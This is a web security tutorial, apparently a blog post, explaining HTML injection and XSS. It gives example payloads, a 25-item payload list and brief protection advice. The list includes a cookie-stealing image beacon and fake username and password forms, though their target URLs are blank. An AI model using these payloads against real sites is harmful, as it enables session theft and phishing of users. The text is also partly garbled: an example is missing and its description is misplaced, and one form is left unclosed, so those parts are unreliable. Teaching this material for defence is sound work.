HTML Injection and Examples


HTML injection is one of the security vulnerabilities in web applications. This type of attack allows attackers to inject malicious HTML or JavaScript code into web pages. As a result, attackers can steal user information, create fake forms, or alter the behavior of the web page.

Fundamentals of HTML Injection

HTML injection usually occurs due to web applications not adequately validating or sanitizing user inputs. For instance, dynamic content, such as user comments, can be displayed directly as HTML on a page. A malicious user can manipulate the page content by adding HTML or JavaScript code in these comment fields.

Critical Risks

  1. Cross-Site Scripting (XSS): HTML injection can lay the groundwork for XSS attacks, where attackers inject JavaScript code to steal users’ cookies or session data.
  2. Modification of Page Content: Injected codes can disrupt the page layout or display misleading information.
  3. Phishing Attacks: Attackers can create fake forms and links to steal sensitive information from users.

Examples of Vulnerable HTML Codes

While providing examples of vulnerable HTML codes, it’s important to consider the risk of misuse of such codes. Therefore, below are some basic and educational examples. These examples show how HTML injection can occur but should not be used in real-world applications.

Example 1: Simple Alert Payload

One of the most common and simple payloads is the JavaScript alert function that displays a warning message in the browser:

<script>alert('This is an injection!');</script>
Example 2: Simple HTML Injection

Suppose a web application allows users to write comments, and these comments are displayed directly as HTML on the page. If a user submits a comment like the following, it could lead to HTML injection:

Useful information, thanks! <script>alert('This is an injection!');</script>

This payload displays the user’s cookie information in an alert window:

Example 4: DOM Manipulation

An example of a payload that manipulates the DOM (Document Object Model) structure to change the content of the page:

<script>document.body.innerHTML = '<h1>Page Hacked</h1>';</script>

In this case, the JavaScript code inside the <script> tag submitted as a comment will be executed on the page. This shows a simple warning message, but more harmful codes could also be injected.

Example 5: Form Injection

If a web page does not properly sanitize user input, attackers can inject fake HTML forms. For example:

<p>Write your comment here:</p>
<form action="" method="post">
    <input type="text" name="username">
    <input type="password" name="password">
    <input type="submit" value="Login">

In this example, a form is injected as user input, and this form is set up to send user information to a server controlled by an attacker.

Example 6: Image Injection

HTML injection can also be used to alter page content. For example, a user could submit the following HTML code as a comment:

<img src="" onerror="alert('Image could not be loaded!')">

In this example, an <img> tag is used to attempt to load an image. If the image is not available or an error occurs, the onerror event is triggered, and a JavaScript alert is displayed.

Example Payload List

These payloads represent various attack scenarios.

  1. <script>alert('XSS');</script>
  2. <img src="hatali.jpg" onerror="alert('XSS Hata!');">
  3. <script>document.write('<h1>Sayfa değiştirildi</h1>');</script>
  4. <iframe src="" width="500" height="500"></iframe>
  5. <body onload=alert('Sayfa yüklendi!')>
  6. <script>fetch('').then(response => response.text()).then(data => document.body.innerHTML = data);</script>
  7. <div style="position:absolute;width:100%;height:100%;top:0;left:0" onclick="alert('Tıkladınız!')"></div>
  8. <a href="javascript:alert('Phishing link!')">Tıklayın</a>
  9. <form action="" method="post"><input type="text" name="username"><input type="password" name="password"><input type="submit"></form>
  10. <script>new Image().src="" + document.cookie;</script>
  11. <script>Object.defineProperty(window, 'location', {value:{href:''}});</script>
  12. <script>while(1){alert('Sonsuz Döngü!')}</script>
  13. <meta http-equiv="refresh" content="0;url=">
  14. <link rel="stylesheet" href="">
  15. <audio src="" autoplay="autoplay"></audio>
  16. <script>document.domain = '';</script>
  17. <embed src="" type="application/x-shockwave-flash"></embed>
  18. <object data="" type="application/x-shockwave-flash"></object>
  19. <script>document.addEventListener('DOMContentLoaded', () => { alert('DOM yüklendi!'); });</script>
  20. <button onclick="alert('Buton tıklandı!')">Tıkla</button>
  21. <style>@import url('');</style>
  22. <base href="">
  23. <script src=""></script>
  24. <noscript><a href="">Javascript etkin değilse tıklayın</a></noscript>
  25. <script>history.pushState('', '', '/fake-path');</script>
Protection Methods
  1. Validation and Sanitization of User Inputs: All user inputs should be validated and sanitized to ensure they do not contain HTML or JavaScript codes.
  2. Firewalls and Filters: Web application firewalls and input filtering systems can block suspicious traffic.
  3. Security Awareness Training: Users should be trained to not click on unsafe links and to report suspicious content.


HTML injection is a serious security threat, but it can be largely prevented with effective security measures. Web applications must adopt secure coding practices and carefully process user inputs.

Leave a Comment

Join our Mailing list!

Get all latest news, exclusive deals and academy updates.